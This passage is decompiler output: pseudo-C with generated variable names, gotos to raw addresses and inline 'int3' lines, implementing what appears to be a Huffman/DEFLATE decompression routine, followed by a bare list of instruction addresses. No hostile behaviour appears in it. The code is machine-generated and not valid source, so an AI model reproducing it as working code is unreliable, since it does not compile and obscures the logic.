																			 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																			 *( *(_t1058 - 0x10)) = _t596;
																			_t944 =  *(_t1058 - 8) - 1;
																			 *(_t1058 - 8) = _t944;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t841 -  *(_t1058 - 0x20);
																			if(_t841 >=  *(_t1058 - 0x20)) {
																				break;
																			}
																			L109:
																			_t596 = ( *_t841 & 0x000000ff) << _t1043;
																			_t841 = _t841 + 1;
																			_t962 = _t962 | _t596;
																			 *(_t1058 - 0x18) = _t841;
																			_t1043 = _t1043 + 8;
																			 *(_t1058 - 4) = _t962;
																			__eflags = _t1043 - 8;
																			if(_t1043 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1022 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t841 -  *(_t1058 - 0x20);
															if(_t841 >=  *(_t1058 - 0x20)) {
																break;
															}
															L92:
															_t820 = ( *_t841 & 0x000000ff) << _t1043;
															_t1043 = _t1043 + 8;
															_t991 = _t991 | _t820;
															_t841 = _t841 + 1;
															 *(_t1058 - 0x18) = _t841;
															_t596 = _t1043 & 0x00000007;
															 *(_t1058 - 4) = _t991;
															__eflags = _t1043 - _t596;
															if(_t1043 < _t596) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1022 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L88:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t962 = _t962 | _t596;
													 *(_t1058 - 0x18) = _t841;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - 3;
													if(_t1043 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1022 = 3;
												goto L285;
											}
											goto L295;
										}
										L252:
										_t596 = _t1043 & 0x00000007;
										__eflags = _t1043 - _t596;
										if(_t1043 >= _t596) {
											L256:
											_t683 =  *(_t1058 - 0x3c);
											_t886 = _t1043 & 0x00000007;
											_t986 = _t962 >> _t886;
											_t1043 = _t1043 - _t886;
											 *(_t1058 - 4) = _t986;
											__eflags = _t841 - _t683;
											if(_t841 > _t683) {
												while(1) {
													L257:
													__eflags = _t1043 - 8;
													if(_t1043 < 8) {
														goto L259;
													}
													L258:
													_t841 = _t841 - 1;
													_t1043 = _t1043 - 8;
													__eflags = _t841 - _t683;
													if(_t841 > _t683) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t596 = _t1043;
											asm("bts edx, eax");
											__eflags = _t596 - 0x20;
											_t888 =  >=  ? _t986 : 0;
											_t987 = _t986 ^ _t888;
											__eflags = _t596 - 0x40;
											_t889 =  >=  ? _t987 : _t888;
											 *(_t1058 - 4) =  *(_t1058 - 4) & _t987 - 0x00000001;
											__eflags =  *(_t1058 + 0x18) & 0x00000001;
											if(( *(_t1058 + 0x18) & 0x00000001) == 0) {
												L290:
												_t684 = 0;
												__eflags = 0;
												 *_t1022 = 0x22;
												L291:
												 *(_t1058 - 0xc) = _t684;
												goto L292;
											} else {
												L261:
												_t890 = 0;
												while(1) {
													L277:
													 *(_t1058 - 8) = _t890;
													__eflags = _t890 - 4;
													if(_t890 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1043;
													if(_t1043 != 0) {
														L281:
														_t989 =  *(_t1058 - 4);
														__eflags = _t1043 - 8;
														if(_t1043 >= 8) {
															L275:
															_t685 = _t989 & 0x000000ff;
															_t1043 = _t1043 - 8;
															__eflags = _t1043;
															 *(_t1058 - 4) = _t989 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	break;
																}
																L273:
																_t596 = ( *_t841 & 0x000000ff) << _t1043;
																_t1043 = _t1043 + 8;
																_t989 = _t989 | _t596;
																_t841 = _t841 + 1;
																 *(_t1058 - 4) = _t989;
																__eflags = _t1043 - 8;
																if(_t1043 < 8) {
																	continue;
																} else {
																	L274:
																	_t890 =  *(_t1058 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1022 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L283:
															 *_t1022 = 0x2a;
															goto L285;
														} else {
															L280:
															_t685 =  *_t841 & 0x000000ff;
															_t841 = _t841 + 1;
															L276:
															 *(_t1058 - 0x24) = _t685;
															_t596 =  *(_t1022 + 0x10) << 0x00000008 |  *(_t1058 - 0x24);
															_t890 = _t890 + 1;
															__eflags = _t890;
															 *(_t1022 + 0x10) = _t596;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													break;
												}
												L255:
												_t690 = ( *_t841 & 0x000000ff) << _t1043;
												_t1043 = _t1043 + 8;
												_t962 = _t962 | _t690;
												_t841 = _t841 + 1;
												 *(_t1058 - 4) = _t962;
												_t596 = _t1043 & 0x00000007;
												__eflags = _t1043 - _t596;
												if(_t1043 < _t596) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1022 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1043 - 0xf;
									if(_t1043 < 0xf) {
										_t999 =  *(_t841 + 1) & 0x000000ff;
										_t880 = _t1043;
										_t721 =  *_t841 & 0x000000ff;
										_t841 = _t841 + 2;
										_t1022 =  *(_t1058 - 0x14);
										 *(_t1058 - 0x18) = _t841;
										 *(_t1058 - 4) =  *(_t1058 - 4) | (_t999 << 0x00000008 | _t721) << _t880;
										_t1043 = _t1043 + 0x10;
										__eflags = _t1043;
										_t962 =  *(_t1058 - 4);
									}
									_t714 =  *((short*)(_t1022 + 0x160 + (_t962 & 0x000003ff) * 2));
									 *(_t1058 - 0x1c) = _t714;
									__eflags = _t714;
									if(_t714 < 0) {
										L53:
										goto 0x421349;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t716 = _t962 >> _t880;
											_t880 = _t880 + 1;
											_t841 =  *((short*)(_t1022 + 0x960 + ((_t716 & 0x00000001) +  !_t841) * 2));
											__eflags = _t841;
										} while (_t841 < 0);
										 *(_t1058 - 0x1c) = _t841;
										_t841 =  *(_t1058 - 0x18);
									} else {
										L52:
										_t880 = _t714 >> 9;
									}
									L56:
									_t596 =  *(_t1058 - 8);
									_t1043 = _t1043 - _t880;
									_t962 = _t962 >> _t880;
									 *(_t1058 - 4) = _t962;
									 *( *(_t1058 - 0x10)) = _t596;
									_t880 =  *(_t1058 - 0x1c);
									__eflags = _t880 & 0x00000100;
									if((_t880 & 0x00000100) != 0) {
										L83:
										_t170 = _t1058 - 0x10;
										 *_t170 =  *(_t1058 - 0x10) + 1;
										__eflags =  *_t170;
										goto L84;
									} else {
										L57:
										_t719 =  *(_t1058 - 0x10);
										 *(_t719 + 1) = _t880;
										 *(_t1058 - 0x10) = _t719 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t879 =  *(_t1058 - 0x20) - _t841;
													__eflags = _t879 - 4;
													if(_t879 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t877;
											} while (_t877 == 0);
											goto 0x4212e3;
											asm("int3");
											_t824 =  *_t830;
											 *_t1022 = _t824;
											_t1022 =  *(_t1058 - 0x14);
											__eflags = _t877 - 1;
											if(_t877 > 1) {
												L29:
												L36:
												goto 0x42131f;
												asm("int3");
												 *(_t982 + 1) =  *((intOrPtr*)(_t824 + 1));
												_t982 =  *(_t1058 - 4);
											}
											L38:
											_t85 = _t1058 - 0x10;
											 *_t85 = _t877 +  *(_t1058 - 0x10);
											__eflags =  *_t85;
											while(1) {
												L39:
												_t879 =  *(_t1058 - 0x20) - _t841;
												__eflags = _t879 - 4;
												if(_t879 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1058 - 0x10) = _t1022;
											_t1022 =  *(_t1058 - 0x14);
											 *(_t1058 - 0xc) = _t982;
											_t982 =  *(_t1058 - 4);
											 *(_t1058 - 8) = _t877;
											__eflags = _t877;
										} while (_t877 <= 0);
										goto 0x42130b;
										asm("int3");
										_t824 =  *_t666;
										 *_t1022 = _t824;
										_t1022 =  *(_t1058 - 0x14);
										__eflags = _t877 - 1;
										if(_t877 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							goto L295;
							L58:
							__eflags = _t1043 - 0xf;
							if(_t1043 >= 0xf) {
								L75:
								_t669 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t669;
								__eflags = _t669;
								if(_t669 < 0) {
									L77:
									goto 0x421372;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t671 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t671 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L76:
									_t879 = _t669 >> 9;
									_t596 = _t669 & 0x000001ff;
									 *(_t1058 - 8) = _t596;
								}
								L80:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 - 0x100;
								if(_t880 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t822 =  *(_t1058 - 0x10);
									__eflags = _t822 -  *((intOrPtr*)(_t1058 - 0x40));
									if(_t822 >=  *((intOrPtr*)(_t1058 - 0x40))) {
										L240:
										 *(_t1058 - 0xc) = 2;
										 *_t1022 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t822 = _t880;
										 *(_t1058 - 0x10) = _t822 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t879 - 2;
								if(_t879 >= 2) {
									L73:
									_t992 =  *(_t841 + 1) & 0x000000ff;
									_t695 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									_t879 = _t1043;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | _t992 << _t1043 + 0x00000008 | _t695 << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t596 = _t982 & 0x000003ff;
										_t1025 =  *((short*)(_t1022 + 0x160 + _t596 * 2));
										__eflags = _t1025;
										if(_t1025 < 0) {
											L64:
											__eflags = _t1043 - 0xa;
											if(_t1043 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1058 - 0x1c) = _t879;
												while(1) {
													L67:
													_t1025 =  *((short*)( *(_t1058 - 0x14) + 0x960 + ((_t982 >> _t879 & 0x00000001) +  !_t1025) * 2));
													_t879 =  *(_t1058 - 0x1c) + 1;
													 *(_t1058 - 0x1c) = _t879;
													__eflags = _t1025;
													if(_t1025 >= 0) {
														goto L74;
													}
													L68:
													_t596 = _t879 + 1;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1027 = _t1025 >> 9;
											__eflags = _t1027;
											if(_t1027 == 0) {
												L69:
												_t1022 =  *(_t1058 - 0x14);
												L70:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													L239:
													 *_t1022 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1043 - _t1027;
												if(_t1043 >= _t1027) {
													L74:
													_t1022 =  *(_t1058 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t879 = _t1043;
										_t699 = ( *_t841 & 0x000000ff) << _t879;
										_t841 = _t841 + 1;
										_t982 = _t982 | _t699;
										 *(_t1058 - 0x18) = _t841;
										_t1043 = _t1043 + 8;
										 *(_t1058 - 4) = _t982;
										__eflags = _t1043 - 0xf;
									} while (_t1043 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1058 - 0xc) = 0x40 + _t694 * 0xda0 + _t1022;
					memset(_t1058 - 0xd0, 0, 0x40);
					memset( *(_t1058 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1058 - 0xc) + 0x920, 0, 0x480);
					_t894 = 0;
					_t1061 = _t1061 + 0x24;
					_t1005 = _t1022 + ( *(_t1022 + 0x18) + 0xb) * 4;
					 *(_t1058 - 0x44) = _t1005;
					__eflags =  *_t1005;
					if( *_t1005 > 0) {
						L143:
						_t1022 =  *(_t1058 - 0xc);
						do {
							L144:
							_t797 =  *(_t894 + _t1022) & 0x000000ff;
							_t894 = _t894 + 1;
							 *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) =  *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) + 1;
							__eflags = _t894 -  *_t1005;
						} while (_t894 <  *_t1005);
					}
					L145:
					goto 0x4213d7;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1058 - 0x8c) = _t894;
					 *(_t1058 - 0x90) = _t894;
					 *(_t1058 - 0x2c) = _t894;
					 *(_t1058 - 0x30) = _t894;
					do {
						L147:
						_t734 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd4));
						_t896 = _t894 + _t734 + _t894 + _t734;
						_t1022 = _t1022 + _t734;
						_t735 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd0));
						 *(_t1058 - 0x30) =  *(_t1058 - 0x30) + _t735;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x90)) = _t896;
						_t736 =  *((intOrPtr*)(_t1058 + _t1005 - 0xcc));
						_t898 = _t896 + _t735 + _t896 + _t735;
						 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) + _t736;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x8c)) = _t898;
						_t894 = _t898 + _t736 + _t898 + _t736;
						 *(_t1058 + _t1005 - 0x88) = _t894;
						_t1005 = _t1005 + 0xc;
						__eflags = _t1005 - 0x40;
					} while (_t1005 <= 0x40);
					 *(_t1058 - 0x4c) = _t894;
					 *(_t1058 - 0x24) = _t1022;
					_t1022 =  *(_t1058 - 0x14);
					_t901 =  *(_t1058 - 0x24) +  *(_t1058 - 0x2c) +  *(_t1058 - 0x30);
					__eflags =  *(_t1058 - 0x4c) - 0x10000;
					if( *(_t1058 - 0x4c) == 0x10000) {
						L150:
						_t739 =  *(_t1058 - 0x44);
						 *(_t1058 - 0x30) = 0xffffffff;
						 *(_t1058 - 0x4c) = 0;
						__eflags =  *_t739;
						if( *_t739 > 0) {
							L151:
							_t1057 =  *(_t1058 - 0x4c);
							do {
								L152:
								L153:
								_t913 =  *(_t1057 + _t739) & 0x000000ff;
								 *(_t1058 - 0x44) = _t913;
								__eflags = _t913;
								if(_t913 != 0) {
									L154:
									_t776 =  *(_t1058 + _t913 * 4 - 0x90);
									 *(_t1058 - 0x2c) = _t776;
									 *(_t1058 + _t913 * 4 - 0x90) = _t776 + 1;
									 *(_t1058 - 0x24) = _t913;
									__eflags = _t913;
									if(_t913 != 0) {
										L155:
										do {
											L156:
											 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) >> 1;
											_t796 =  *(_t1058 - 0x24) - 1;
											_t1005 = _t1005 + _t1005 |  *(_t1058 - 0x2c) & 0x00000001;
											 *(_t1058 - 0x24) = _t796;
											__eflags = _t796;
										} while (_t796 != 0);
										_t913 =  *(_t1058 - 0x44);
									}
									L158:
									__eflags = _t913 - 0xa;
									if(_t913 > 0xa) {
										L164:
										_t780 =  *(_t1058 - 0xc) + 0x120 + (_t1005 & 0x000003ff) * 2;
										_t841 =  *(_t1058 - 0x30);
										 *(_t1058 - 0x44) = _t780;
										_t781 =  *_t780;
										 *(_t1058 - 0x2c) = _t781;
										__eflags = _t781;
										if(_t781 == 0) {
											 *( *(_t1058 - 0x44)) = _t841;
											_t781 = _t841;
											_t841 = _t841 - 2;
											__eflags = _t841;
											 *(_t1058 - 0x2c) = _t781;
											 *(_t1058 - 0x30) = _t841;
										}
										L166:
										_t1013 = _t1005 >> 9;
										__eflags = _t913 - 0xb;
										if(_t913 > 0xb) {
											L167:
											_t914 = _t913 + 0xfffffff5;
											__eflags = _t914;
											 *(_t1058 - 0x24) = _t914;
											_t915 =  *(_t1058 - 0x2c);
											do {
												L168:
												_t1013 = _t1013 >> 1;
												_t786 = 0x48f - _t915 - (_t1013 & 0x00000001);
												_t918 =  *( *(_t1058 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t918;
												if(_t918 != 0) {
													_t915 = _t918;
												} else {
													 *( *(_t1058 - 0xc) + _t786 * 2) = _t841;
													_t787 =  *(_t1058 - 0x30);
													_t915 = _t787;
													_t788 = _t787 - 2;
													 *(_t1058 - 0x30) = _t788;
													_t841 = _t788;
												}
												L171:
												_t361 = _t1058 - 0x24;
												 *_t361 =  *(_t1058 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1058 - 0x2c) = _t915;
											_t781 = _t915;
										}
										L173:
										_t1005 = (_t1013 >> 0x00000001 & 0x00000001) - _t781;
										__eflags = _t1005;
										 *( *(_t1058 - 0xc) + 0x91e + _t1005 * 2) = _t1057;
									} else {
										L159:
										_t793 = (_t913 << 0x00000009 | _t1057) & 0x0000ffff;
										 *(_t1058 - 0x44) = _t793;
										__eflags = _t1005 - 0x400;
										if(_t1005 < 0x400) {
											L160:
											goto 0x421401;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t794 = _t793 << _t913;
											 *(_t1058 - 0x4c) = _t794 + _t794;
											_t923 =  *(_t1058 - 0xc) + _t1005 * 2 + 0x120;
											__eflags = _t923;
											do {
												L162:
												 *_t923 = _t1022;
												_t1005 = _t1005 + _t794;
												_t923 = _t923 +  *(_t1058 - 0x4c);
												__eflags = _t1005 - 0x400;
											} while (_t1005 < 0x400);
											_t1022 =  *(_t1058 - 0x14);
										}
									}
								}
								L174:
								_t739 =  *(_t1022 + 0x18);
								_t1057 = _t1057 + 1;
								__eflags = _t1057 -  *((intOrPtr*)(_t1022 + 0x2c + _t739 * 4));
							} while (_t1057 <  *((intOrPtr*)(_t1022 + 0x2c + _t739 * 4)));
							goto 0x421417;
							asm("int3");
						}
						L176:
						__eflags =  *(_t1022 + 0x18) - 2;
						if( *(_t1022 + 0x18) != 2) {
							L217:
							 *(_t1022 + 0x18) =  *(_t1022 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t902 = 0;
							__eflags = 0;
							while(1) {
								L178:
								_t1006 =  *(_t1058 - 4);
								while(1) {
									L179:
									 *(_t1058 - 8) = _t902;
									__eflags = _t902 -  *(_t1022 + 0x30) +  *(_t1022 + 0x2c);
									if(_t902 >=  *(_t1022 + 0x30) +  *(_t1022 + 0x2c)) {
										break;
									}
									L180:
									__eflags = _t1057 - 0xf;
									if(_t1057 >= 0xf) {
										L197:
										_t754 =  *((short*)(_t1022 + 0x1ca0 + (_t1006 & 0x000003ff) * 2));
										 *(_t1058 - 0x28) = _t754;
										__eflags = _t754;
										if(_t754 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1058 - 0x28) =  !( *(_t1058 - 0x28));
												_t756 = _t1006 >> _t902;
												_t902 = _t902 + 1;
												_t596 =  *((short*)(_t1022 + 0x24a0 + ((_t756 & 0x00000001) +  *(_t1058 - 0x28)) * 2));
												 *(_t1058 - 0x28) = _t596;
												__eflags = _t596;
											} while (_t596 < 0);
										} else {
											L198:
											_t902 = _t754 >> 9;
											_t596 = _t754 & 0x000001ff;
											 *(_t1058 - 0x28) = _t596;
										}
										L202:
										_t1006 = _t1006 >> _t902;
										_t1043 = _t1057 - _t902;
										 *(_t1058 - 4) = _t1006;
										 *(_t1058 - 0x1c) = _t1043;
										__eflags = _t596 - 0x10;
										if(__eflags >= 0) {
											L204:
											if(__eflags != 0) {
												L207:
												_t903 =  *((char*)(_t596 + 0x410ff0));
												 *(_t1058 - 0x38) = _t903;
												__eflags = _t1043 - _t903;
												if(_t1043 >= _t903) {
													L211:
													_t1043 = _t1043 - _t903;
													 *(_t1058 - 0x1c) = _t1043;
													_t904 =  *(_t1058 - 0x14);
													_t1032 = ((0x00000001 << _t903) - 0x00000001 & _t1006) +  *((char*)(_t596 + 0x410ff8));
													__eflags =  *(_t1058 - 0x28) - 0x10;
													_t760 =  *(_t1058 - 8);
													 *(_t1058 - 4) = _t1006 >> _t903;
													if( *(_t1058 - 0x28) != 0x10) {
														_t1009 = 0;
														__eflags = 0;
													} else {
														_t1009 =  *(_t760 + _t904 + 0x2923) & 0x000000ff;
													}
													L214:
													memset(_t760 + _t904 + 0x2924, _t1009, _t1032);
													_t1061 = _t1061 + 0xc;
													_t902 =  *(_t1058 - 8) + _t1032;
													_t1022 =  *(_t1058 - 0x14);
													L178:
													_t1006 =  *(_t1058 - 4);
													continue;
												} else {
													while(1) {
														L208:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															break;
														}
														L209:
														_t596 = ( *_t841 & 0x000000ff) << _t1043;
														_t841 = _t841 + 1;
														_t903 =  *(_t1058 - 0x38);
														_t1006 = _t1006 | _t596;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 0x18) = _t841;
														 *(_t1058 - 4) = _t1006;
														__eflags = _t1043 - _t903;
														if(_t1043 < _t903) {
															continue;
														} else {
															L210:
															_t596 =  *(_t1058 - 0x28);
															goto L211;
														}
														goto L295;
													}
													L251:
													 *_t1022 = 0x12;
													goto L285;
												}
											} else {
												L205:
												_t764 =  *(_t1058 - 8);
												__eflags = _t764;
												if(_t764 == 0) {
													L268:
													_t684 = _t764 | 0xffffffff;
													 *_t1022 = 0x11;
													goto L291;
												} else {
													L206:
													_t596 =  *(_t1058 - 0x28);
													goto L207;
												}
											}
										} else {
											L203:
											_t908 =  *(_t1058 - 8);
											 *(_t1022 + 0x2924 + _t908) = _t596;
											_t902 = _t908 + 1;
											continue;
										}
									} else {
										L181:
										__eflags =  *(_t1058 - 0x20) - _t841 - 2;
										if( *(_t1058 - 0x20) - _t841 >= 2) {
											L195:
											_t1010 =  *(_t841 + 1) & 0x000000ff;
											_t767 =  *_t841 & 0x000000ff;
											_t841 = _t841 + 2;
											_t902 = _t1057;
											 *(_t1058 - 0x18) = _t841;
											 *(_t1058 - 4) =  *(_t1058 - 4) | _t1010 << _t1057 + 0x00000008 | _t767 << _t902;
											_t1057 = _t1057 + 0x10;
											__eflags = _t1057;
											_t1006 =  *(_t1058 - 4);
											goto L196;
										} else {
											do {
												L182:
												_t596 = _t1006 & 0x000003ff;
												_t1033 =  *((short*)(_t1022 + 0x1ca0 + _t596 * 2));
												__eflags = _t1033;
												if(_t1033 < 0) {
													L186:
													__eflags = _t1057 - 0xa;
													if(_t1057 <= 0xa) {
														goto L191;
													} else {
														L187:
														L188:
														 *(_t1058 - 0x24) = _t902;
														while(1) {
															L189:
															_t1033 =  *((short*)( *(_t1058 - 0x14) + 0x24a0 + ((_t1006 >> _t902 & 0x00000001) +  !_t1033) * 2));
															_t902 =  *(_t1058 - 0x24) + 1;
															 *(_t1058 - 0x24) = _t902;
															__eflags = _t1033;
															if(_t1033 >= 0) {
																goto L196;
															}
															L190:
															_t596 = _t902 + 1;
															__eflags = _t1057 - _t596;
															if(_t1057 >= _t596) {
																continue;
															} else {
																goto L191;
															}
															goto L295;
														}
														goto L196;
													}
												} else {
													L183:
													_t1035 = _t1033 >> 9;
													__eflags = _t1035;
													if(_t1035 == 0) {
														L191:
														_t1022 =  *(_t1058 - 0x14);
														L192:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L250:
															 *_t1022 = 0x10;
															goto L285;
														} else {
															goto L193;
														}
													} else {
														L184:
														__eflags = _t1057 - _t1035;
														if(_t1057 >= _t1035) {
															L196:
															_t1022 =  *(_t1058 - 0x14);
															goto L197;
														} else {
															L185:
															goto L191;
														}
													}
												}
												goto L295;
												L193:
												_t902 = _t1057;
												_t771 = ( *_t841 & 0x000000ff) << _t902;
												_t841 = _t841 + 1;
												_t1006 = _t1006 | _t771;
												 *(_t1058 - 0x18) = _t841;
												_t1057 = _t1057 + 8;
												 *(_t1058 - 4) = _t1006;
												__eflags = _t1057 - 0xf;
											} while (_t1057 < 0xf);
											goto L197;
										}
									}
									goto L295;
								}
								L215:
								_t1007 =  *(_t1022 + 0x2c);
								_t743 =  *(_t1022 + 0x30) + _t1007;
								__eflags = _t743 - _t902;
								if(_t743 != _t902) {
									L269:
									_t684 = _t743 | 0xffffffff;
									 *_t1022 = 0x15;
									goto L291;
								} else {
									L216:
									memcpy(_t1022 + 0x40, _t1022 + 0x2924, _t1007);
									_t749 =  *(_t1022 + 0x2c) + 0x2924 + _t1022;
									__eflags = _t749;
									memcpy(_t1022 + 0xde0, _t749,  *(_t1022 + 0x30));
									_t1061 = _t1061 + 0x18;
									goto L217;
								}
								goto L295;
							}
						}
					} else {
						L149:
						__eflags = _t901 - 1;
						if(_t901 > 1) {
							L267:
							 *(_t1058 - 0xc) = 0xffffffff;
							 *_t1022 = 0x23;
							goto L292;
						} else {
							goto L150;
						}
					}
					goto L295;
				}
			}

0x00405bd5
0x00405bd5
0x00405bd5
0x00405bd5
0x00405bd5
0x00405bd5
0x00405bde
0x00405be4
0x00405be7
0x00405bec
0x00405bec
0x00405bec
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405bf4
0x00405bf4
0x00405bf7
0x00405c1a
0x00405c1f
0x00405c22
0x00405c25
0x00405c28
0x00405c2b
0x00405c2e
0x00405c35
0x00405c3f
0x00000000
0x00405bf9
0x00405bf9
0x00405bf9
0x00405bf9
0x00405bfc
0x00000000
0x00000000
0x00405c02
0x00405c07
0x00405c09
0x00405c0a
0x00405c0c
0x00405c0f
0x00405c12
0x00405c15
0x00405c18
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c18
0x00406290
0x00406290
0x00406422
0x00406422
0x0040642b
0x00406430
0x00406430
0x00406433
0x00406436
0x00406439
0x0040643b
0x0040643b
0x0040643e
0x00406440
0x0040644d
0x0040644d
0x00406450
0x00406452
0x00406454
0x00406454
0x00406454
0x00406457
0x00000000
0x00000000
0x00406459
0x00406459
0x0040645a
0x0040645d
0x0040645f
0x00000000
0x00000000
0x00000000
0x0040645f
0x00406454
0x00406452
0x0040643e
0x00406439
0x00406461
0x00406461
0x00406464
0x00406466
0x0040646b
0x0040646e
0x00406471
0x00406474
0x00406476
0x00406479
0x00406483
0x0040648e
0x00406491
0x00406495
0x0040649b
0x004064a1
0x004064a7
0x004064aa
0x004064ad
0x004064b2
0x004064b5
0x004064b7
0x004064bd
0x004064bd
0x004064bf
0x004064c5
0x004064c5
0x004064cf
0x004064d5
0x004064de
0x004064e1
0x004064e4
0x004064e6
0x004064ea
0x004064ed
0x004064f3
0x004064f3
0x004064f5
0x004064f5
0x004064f5
0x004064f7
0x004064fa
0x004064fd
0x00406503
0x00406503
0x00406508
0x00406509
0x0040650a
0x0040650b
0x0040650b
0x0040650b
0x00406510
0x00406510
0x00406513
0x00406516
0x00406521
0x0040652c
0x00406537
0x00406542
0x0040654d
0x00406558
0x00406563
0x00406568
0x0040656b
0x0040656d
0x00406572
0x00406574
0x00406574
0x00406579
0x0040657c
0x0040657c
0x0040657f
0x0040657f
0x00406581
0x00406584
0x00406586
0x00406588
0x0040658c
0x0040658f
0x00406591
0x00406591
0x00406596
0x0040659e
0x004065a2
0x004065a2
0x004065a6
0x004065b0
0x004065b0
0x004065b3
0x004065b5
0x004065b9
0x004065bb
0x004065be
0x004065c0
0x004065c2
0x004065c2
0x004065c2
0x004065c5
0x004065c8
0x004065cb
0x004065ce
0x004065d1
0x004065d1
0x004065d4
0x004065d4
0x004065d6
0x004065d8
0x004065de
0x004065e0
0x004065e2
0x004065e2
0x004065e3
0x004065e3
0x004065e6
0x004065e9
0x004065eb
0x004065eb
0x004065eb
0x004065ed
0x004065f2
0x004065fd
0x00406609
0x0040660f
0x00406611
0x00406611
0x00406611
0x00406614
0x00406619
0x0040661c
0x0040661c
0x00406625
0x0040662a
0x0040662a
0x0040662b
0x0040662e
0x00406630
0x00406633
0x00406635
0x00406637
0x0040663b
0x0040663d
0x00406645
0x00406645
0x0040663b
0x00406635
0x004064bf
0x00406648
0x00406650
0x00000000
0x00406650
0x00405c42
0x00405c42
0x00405c49
0x00405c49
0x00405c49
0x00405c4c
0x00405c4e
0x00000000
0x00000000
0x004060ee
0x004060ee
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x004055f6
0x004055fc
0x004055ff
0x00405602
0x00000000
0x00405608
0x00405608
0x00405608
0x0040560b
0x0040560d
0x00405611
0x00405613
0x00405616
0x0040561e
0x00405623
0x00405626
0x00405626
0x00405629
0x00405629
0x00405633
0x0040563b
0x0040563e
0x00405640
0x00405649
0x00405649
0x0040564e
0x0040564f
0x00405650
0x00405651
0x00405651
0x00405655
0x00405657
0x0040565b
0x0040565d
0x00405665
0x00405665
0x00405669
0x0040566c
0x00405642
0x00405642
